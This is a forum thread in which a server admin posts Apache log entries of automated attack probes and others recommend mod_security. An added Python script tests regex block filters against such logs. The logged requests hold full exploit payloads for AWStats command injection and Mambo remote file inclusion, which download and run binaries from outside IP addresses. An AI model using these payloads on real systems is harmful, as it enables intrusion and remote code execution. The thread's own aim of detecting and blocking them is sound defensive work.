# apache: Block specific request patterns [SOLVED]

## gouranga

Every day when checking my logs, I come across the same entries.

Isn't there a module that blocks these requests, so script kiddies don't waste my bandwidth?

I already have installed mod_evasive, but the scripts wait too long to make a new request.

I can't change it to a higher value. The forum would then get blacklisted.

```
210.253.115.35 - - [23/Dec/2005:23:32:55 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 285

kando-kzai.jp - - [23/Dec/2005:23:32:57 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 403 289

kando-kzai.jp - - [23/Dec/2005:23:32:58 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 403 297

210.253.115.35 - - [23/Dec/2005:23:33:00 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 200 315

210.253.115.35 - - [23/Dec/2005:23:33:00 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 200 1033

210.253.115.35 - - [23/Dec/2005:23:33:01 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 283

210.253.115.35 - - [23/Dec/2005:23:33:03 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 287

193.203.240.228 - - [24/Dec/2005:17:42:09 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 1033

193.203.240.228 - - [24/Dec/2005:17:42:10 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 315

193.203.240.228 - - [24/Dec/2005:17:42:11 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 283

193.203.240.228 - - [24/Dec/2005:17:42:12 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 281

193.203.240.228 - - [24/Dec/2005:17:42:13 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 287

193.203.240.228 - - [24/Dec/2005:17:42:14 +0100] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 287

```

Last edited by gouranga on Sun Dec 25, 2005 10:11 pm; edited 1 time in total

----------

## steveb

You could install mod_security and block the requests.

cheers

SteveB

----------

## cynric

You will probably want to look at something like mod_security. This allows for custom filters. Hope that helps.

[edit] Looks like steveb beat me to it.

----------
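One way to try candidate filter patterns against an access log before turning them into mod_security rules, added here as an example that is not part of the original thread. The two regexes, the function names and the sample log lines (documentation addresses, shortened requests) are assumptions constructed from the request shapes in the log above; the script also separates flagged requests that were answered with 200 from those that got 403/404.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) (\S+)$')

# Candidate filters (assumed, modelled on the thread's log), applied to the
# URL-decoded request line so percent-encoded variants are caught as well.
FILTERS = {
    "remote-include": re.compile(r'mosConfig_absolute_path=(?:https?|ftp)://', re.I),
    "awstats-configdir-pipe": re.compile(r'awstats\.pl\?.*configdir=[^&]*\|', re.I),
}

# Constructed sample input: three probes and two legitimate requests.
SAMPLE_LOG = """
192.0.2.10 - - [23/Dec/2005:23:32:55 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;echo|  HTTP/1.1" 404 285
192.0.2.10 - - [23/Dec/2005:23:33:00 +0100] "GET /index.php?option=com_content&GLOBALS=&mosConfig_absolute_path=http://192.0.2.99/cmd.gif?&cmd=echo%20YYY  HTTP/1.1" 200 315
192.0.2.10 - - [23/Dec/2005:23:33:01 +0100] "GET /mambo/index2.php?GLOBALS=&mosConfig_absolute_path=http%3A%2F%2F192.0.2.99/cmd.gif?&cmd=echo%20YYY  HTTP/1.1" 404 283
198.51.100.7 - - [23/Dec/2005:23:34:10 +0100] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120
198.51.100.7 - - [23/Dec/2005:23:34:12 +0100] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 200 20480
"""

def classify(line):
    """Parse one log line; return None if it is not in Common Log Format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    host, _ts, request, status, _size = m.groups()
    decoded = unquote(request)  # match on what the application would see
    hits = sorted(name for name, rx in FILTERS.items() if rx.search(decoded))
    return {"host": host, "status": int(status), "request": request, "hits": hits}

def scan(text):
    """Return (all parsed records, records a filter matched, matched records served with 200)."""
    records = [r for r in map(classify, text.splitlines()) if r]
    flagged = [r for r in records if r["hits"]]
    served = [r for r in flagged if r["status"] == 200]
    return records, flagged, served

if __name__ == "__main__":
    records, flagged, served = scan(SAMPLE_LOG)
    print(f"{len(flagged)} of {len(records)} requests would be blocked")
    for r in served:
        print("answered with 200, check this URL:", r["host"], r["hits"], r["request"][:60])
```

Any legitimate request that shows up in the flagged list is a false positive to fix before the pattern goes into a blocking rule.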

## gouranga

I finally installed and configured mod_security.

It solved all my problems at last.

Content spam & script kiddies are more or less under control.

See also https://forums.gentoo.org/viewtopic-p-2981900.html#2981900

I tried to summarize a few steps to get mod_sec working in this thread.

I didn't find any howtos on mod_security.

Maybe when I have the time I will write one.

Thx for the replies.

----------

## cynric

Glad you got it working. mod_security is a beast of a module, but does some really nice things. This isn't mod_sec specific, more hardening, but might be of some use as well: How's Your Network - Hardening.

----------

